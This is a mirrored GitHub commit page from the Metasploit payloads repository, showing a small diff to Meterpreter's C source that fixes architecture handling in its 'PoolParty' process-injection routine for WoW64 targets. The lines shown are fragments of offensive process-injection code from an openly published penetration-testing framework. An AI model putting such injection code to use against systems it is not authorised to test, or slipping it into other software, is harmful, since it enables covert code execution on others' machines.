github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-18 15:14:10 +01:00
Code Releases Activity

fix: handling WoW64 injection destinationArch

Browse Source
This commit is contained in:
dledda-r7 2024-09-02 07:28:04 -04:00
parent a97444d79c
commit b18df9c9fe
No known key found for this signature in database
GPG Key ID: 4D4EC504A1F02FFF
2 changed files with 1 additions and 3 deletions
c/meterpreter/source/metsrv
base_inject.cpool_party.c

1
c/meterpreter/source/metsrv/base_inject.c

@ -573,6 +573,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
memcpy(lpStub, x64tox86, sizeof(x64tox86) - 1); memcpy(lpStub, x64tox86, sizeof(x64tox86) - 1);
memcpy((LPBYTE)lpStub + sizeof(x64tox86) - 1, poolparty_stub_x86, sizeof(poolparty_stub_x86)); memcpy((LPBYTE)lpStub + sizeof(x64tox86) - 1, poolparty_stub_x86, sizeof(poolparty_stub_x86));
dwStubSize = sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2; dwStubSize = sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2;
dwDestinationArch = PROCESS_ARCH_X64;
} }
hTriggerEvent = CreateEvent(NULL, TRUE, FALSE, NULL); hTriggerEvent = CreateEvent(NULL, TRUE, FALSE, NULL);

3
c/meterpreter/source/metsrv/pool_party.c

@ -163,14 +163,11 @@ DWORD remote_tp_direct_insertion(HANDLE hProcess, DWORD dwDestinationArch, LPVOI
pNtDll* ntDll = NULL; pNtDll* ntDll = NULL;
DWORD dwResult = ERROR_POOLPARTY_GENERIC; DWORD dwResult = ERROR_POOLPARTY_GENERIC;
HANDLE hHeap = GetProcessHeap(); HANDLE hHeap = GetProcessHeap();
dwDestinationArch = PROCESS_ARCH_X64;
DWORD dwDirectSize = dwDestinationArch == PROCESS_ARCH_X64 ? TP_DIRECT_STRUCT_SIZE_X64 : TP_DIRECT_STRUCT_SIZE_X86; DWORD dwDirectSize = dwDestinationArch == PROCESS_ARCH_X64 ? TP_DIRECT_STRUCT_SIZE_X64 : TP_DIRECT_STRUCT_SIZE_X86;
WOW64_CONTEXT test = { 0 };
LPVOID *Direct = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwDirectSize); LPVOID *Direct = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwDirectSize);
do { do {
ntDll = GetOrInitNtDll(); ntDll = GetOrInitNtDll();
dprintf("%d fs offset: %p", sizeof(WOW64_CONTEXT), (QWORD)&test.SegFs - (QWORD)&test);
if (ntdll == NULL) { if (ntdll == NULL) {
BREAK_WITH_ERROR("[INJECT][inject_via_poolparty][remote_tp_direct_insertion] Cannot GetOrInitNtDll()", ERROR_POOLPARTY_GENERIC); BREAK_WITH_ERROR("[INJECT][inject_via_poolparty][remote_tp_direct_insertion] Cannot GetOrInitNtDll()", ERROR_POOLPARTY_GENERIC);
} }